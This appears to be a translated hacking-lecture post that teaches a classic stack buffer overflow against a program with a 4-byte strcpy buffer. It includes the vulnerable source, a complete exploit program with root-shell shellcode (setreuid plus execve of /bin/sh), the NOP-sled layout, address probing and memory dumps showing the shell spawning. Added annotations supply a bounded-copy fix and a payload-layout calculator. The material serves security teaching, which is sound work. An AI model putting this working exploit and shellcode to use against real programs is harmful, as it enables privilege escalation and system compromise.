http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1438
The exploit we built last time did all of its work inside the vulnerable program's own buffer. This time we will exploit a program that gives buf only 4 bytes.
vuln.c
#include <stdio.h>
#include <string.h>
#include "dumpcode.h"   // the post's hex-dump helper, not reproduced here

int main(int argc, char *argv[])
{
    char buf[4]; // only 4 bytes are allocated
    // Stack layout: [buf(4)][sfp(4)][ret(4)]
    // The space we can use before ret is 8 bytes.
    // The method from last time cannot work here.
    strcpy(buf, argv[1]);   // no bound: everything above buf gets overwritten
    dumpcode(buf, 500);     // dump the stack from buf upward
    return 0;
}
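The overflow exists only because strcpy has no bound. For contrast, here is the same program with the copy bounded by the destination size, so argv[1] can never reach sfp or the saved return address. This is an added example of mine, not code from the post; bounded_copy and BUF_LEN are names I chose. The rest of the post attacks the original, unbounded version.

```c
/* Added example (not from the original post): vuln.c with the copy bounded
 * by sizeof(buf). Input that does not fit together with its NUL terminator
 * is rejected instead of spilling over sfp and ret. */
#include <stdio.h>
#include <string.h>

#define BUF_LEN 4   /* same 4-byte buffer as the post's vuln.c */

/* Copy src into dst (dst_len bytes) only if it fits with its terminator.
 * Returns 0 on success, -1 if the input was rejected; on rejection dst is
 * left as an empty string so callers never see an unterminated buffer.
 * strncpy alone is not enough here: for inputs of dst_len or more bytes it
 * fills dst completely and writes no terminator. */
int bounded_copy(char *dst, size_t dst_len, const char *src)
{
    size_t n;
    if (dst_len == 0)
        return -1;
    n = strlen(src);
    if (n >= dst_len) {          /* no room for the NUL: refuse the input */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);     /* n + 1 copies the terminator too */
    return 0;
}

int main(int argc, char *argv[])
{
    char buf[BUF_LEN];

    if (argc < 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return 1;
    }
    if (bounded_copy(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n",
                (size_t)(sizeof buf - 1));
        return 1;
    }
    printf("copied: %s\n", buf);
    return 0;
}
```

With this check the 600-byte payload used later in the post is simply refused; nothing above buf is ever written.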
So how do we make the attack succeed? There are two ways.
1. Exploit using environment variables
2. Exploit using NOPs
(RTL is left out for now .. lol)
In this lecture we will use the second method.
Only 8 bytes, so where do the NOPs go?
The trick is simple. strcpy does not stop at ret: everything above it on the stack is overwritten as well. So after ret we place NOPs and then the shellcode, and make ret point anywhere inside the NOPs; execution slides down the NOPs into the shellcode.
Stack layout for the attack:

[garbage (8 bytes)][RET (4 bytes)][NOP x 200 (200 bytes)][shellcode]
                        |               ^
                        +---------------+
   RET points anywhere inside the NOP run; execution slides forward into the shellcode.

Build it this way and it works.
First, let's find the address where the NOPs after ret will land. Pass 600 NOPs as argv[1] and let dumpcode show where they end up:
[test@localhost test]$ ./vuln `perl -e 'print "\x90"x600'`
0xbffff904 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff914 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff924 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff934 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff944 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff954 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff964 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff974 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff984 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff994 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff9a4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff9b4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff9c4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff9d4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff9e4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff9f4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa04 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa14 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa24 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa34 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa44 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa54 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa64 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa74 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa84 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffa94 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffaa4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffab4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffac4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffad4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffae4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffffaf4 90 90 90 90
Plenty of room there. Let's use 0xbffff924. Any address inside the run of 0x90 would do; picking one a little way in leaves slack on both sides in case buf moves between runs. (All of this depends on the stack being executable and sitting at a predictable address, which is what these fixed 0xbffff... addresses show; with a non-executable stack or ASLR a NOP sled alone is not enough.)
ex.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// setreuid(0,0) followed by execve("/bin/sh"); it contains no NUL bytes,
// so strcpy copies it whole.
char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

int main(int argc, char *argv[])
{
    int i;
    long ret, *addr_ptr;        // 32-bit target: long is 4 bytes
    char *buffer, *ptr;

    ret = 0xbffff924;           // the RET value we will use
    buffer = malloc(600);
    if (buffer == NULL)
        return 1;
    ptr = buffer;
    addr_ptr = (long *) ptr;
    for (i = 0; i < 600; i += 4)
        *(addr_ptr++) = ret;    // fill all 600 bytes with ret
    for (i = 0; i < 8; i++)
        buffer[i] = '\x41';     // first 8 bytes (buf + sfp) become 'A'
    ptr = buffer + 12;          // layout is [A x 8][RET (4 bytes)], so the
                                // NOPs start at buffer + 12, right after ret
    for (i = 0; i < 200; i++)
        *(ptr++) = '\x90';      // write the NOP sled
    ptr = buffer + 212;         // where the shellcode goes
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];    // shellcode after RET and the NOPs
    buffer[600 - 1] = 0;        // terminator so strcpy stops here
    execl("./vuln", "vuln", buffer, (char *) NULL);   // run the target
    free(buffer);               // only reached if execl fails
    return 0;
}
Before the attack:
[test@localhost test]$ ps
PID TTY TIME CMD
681 pts/0 00:00:00 bash
732 pts/0 00:00:00 bash2
741 pts/0 00:00:00 ps
Attack:
[test@localhost test]$ ./ex
0xbffff8d4 41 41 41 41 41 41 41 41 24 f9 ff bf 90 90 90 90 AAAAAAAA$.......
0xbffff8e4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff8f4 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff904 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff914 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff924 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff934 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff944 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff954 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff964 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff974 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff984 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff994 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
0xbffff9a4 90 90 90 90 31 c0 b0 46 31 db 31 c9 cd 80 eb 16 ....1..F1.1.....
0xbffff9b4 5b 31 c0 88 43 07 89 5b 08 89 43 0c b0 0b 8d 4b [1..C..[..C....K
0xbffff9c4 08 8d 53 0c cd 80 e8 e5 ff ff ff 2f 62 69 6e 2f ..S......../bin/
0xbffff9d4 73 68 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf sh..$...$...$...
0xbffff9e4 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffff9f4 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa04 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa14 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa24 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa34 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa44 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa54 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa64 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa74 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa84 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffa94 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffaa4 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffab4 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf 24 f9 ff bf $...$...$...$...
0xbffffac4 24 f9 ff bf $...
bash$
Note that buf landed at 0xbffff8d4 this time, 48 bytes lower than 0xbffff904 in the probe run, so RET = 0xbffff924 hit offset 80 into the copied data: still inside the 200-byte NOP sled, which is exactly the slack the sled is there to provide. After the attack:
bash$ ps
PID TTY TIME CMD
681 pts/0 00:00:00 bash
732 pts/0 00:00:00 bash2
739 pts/0 00:00:00 sh // the attack succeeded: this is the shell spawned by the shellcode
740 pts/0 00:00:00 ps
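To make the layout and the sled's tolerance concrete, here is an added example of mine (not code from the post). It builds the payload exactly as ex.c lays it out, then computes, for a given actual address of buf, which offset RET lands on and the whole range of buf addresses for which RET still hits the sled. The two buf addresses it checks are the ones the post's dumps report (0xbffff904 in the NOP probe, 0xbffff8d4 when ex ran vuln); the shellcode is replaced by a few int3 placeholder bytes, and the function names are my own.

```c
/* Added example (not from the original post): build the post's payload
 * layout and check how much the 200-byte NOP sled lets buf move.
 * Addresses are the ones shown in the post's dumpcode output. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAYLOAD_LEN 600
#define GARBAGE_LEN 8              /* buf(4) + sfp(4) */
#define RET_OFF     8              /* saved return address sits after sfp */
#define NOP_OFF     12             /* first NOP byte, directly above RET */
#define NOP_LEN     200
#define SC_OFF      (NOP_OFF + NOP_LEN)   /* 212, where the shellcode starts */

/* Placeholder standing in for the post's shellcode: int3 bytes, so a stray
 * execution traps instead of doing anything. */
static const unsigned char marker[] = { 0xcc, 0xcc, 0xcc, 0xcc };

/* Layout: [A x 8][RET][NOP x 200][payload][RET ... padding][NUL].
 * Returns the number of bytes written, or 0 if the pieces don't fit. */
size_t build_payload(unsigned char *out, size_t out_len, uint32_t ret,
                     const unsigned char *sc, size_t sc_len)
{
    size_t i;
    if (out_len < PAYLOAD_LEN || SC_OFF + sc_len >= PAYLOAD_LEN)
        return 0;
    /* Fill everything with RET first (little-endian, as on x86) so every
     * word above the sled is also a valid pointer into it, like ex.c does. */
    for (i = 0; i + 4 <= PAYLOAD_LEN; i += 4) {
        out[i]     = (unsigned char)(ret & 0xff);
        out[i + 1] = (unsigned char)((ret >> 8) & 0xff);
        out[i + 2] = (unsigned char)((ret >> 16) & 0xff);
        out[i + 3] = (unsigned char)((ret >> 24) & 0xff);
    }
    memset(out, 'A', GARBAGE_LEN);          /* garbage over buf and sfp */
    memset(out + NOP_OFF, 0x90, NOP_LEN);   /* the sled */
    memcpy(out + SC_OFF, sc, sc_len);       /* shellcode right after it */
    out[PAYLOAD_LEN - 1] = 0;               /* strcpy needs a terminator */
    return PAYLOAD_LEN;
}

/* Given where buf actually landed (the dumpcode base address), at which
 * payload offset does RET point? Returns -1 when it misses the sled. */
long sled_offset(uint32_t buf_base, uint32_t ret)
{
    long off = (long)ret - (long)buf_base;
    if (off < NOP_OFF || off >= NOP_OFF + NOP_LEN)
        return -1;
    return off;
}

/* Range of buf addresses for which RET still lands somewhere in the sled. */
void sled_window(uint32_t ret, uint32_t *lo, uint32_t *hi)
{
    *lo = ret - (NOP_OFF + NOP_LEN - 1);   /* RET hits the last NOP */
    *hi = ret - NOP_OFF;                   /* RET hits the first NOP */
}

int main(void)
{
    unsigned char p[PAYLOAD_LEN];
    uint32_t ret = 0xbffff924u, lo, hi;

    build_payload(p, sizeof p, ret, marker, sizeof marker);
    /* The two bases the post observed: NOP probe run and the real attack. */
    printf("probe run,   buf at 0xbffff904: RET -> offset %ld\n",
           sled_offset(0xbffff904u, ret));
    printf("exploit run, buf at 0xbffff8d4: RET -> offset %ld\n",
           sled_offset(0xbffff8d4u, ret));
    sled_window(ret, &lo, &hi);
    printf("RET stays inside the sled for buf anywhere in [0x%08x, 0x%08x]\n",
           lo, hi);
    return 0;
}
```

The window shows why the 48-byte shift between the two runs did not matter: with RET = 0xbffff924 any buf address from 0xbffff851 up to 0xbffff918 still lands in the sled. Choosing a RET near the middle of the observed 0x90 run, rather than at its edge, maximises that slack in both directions.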
Hit : 7013 Date : 2010/03/18 06:55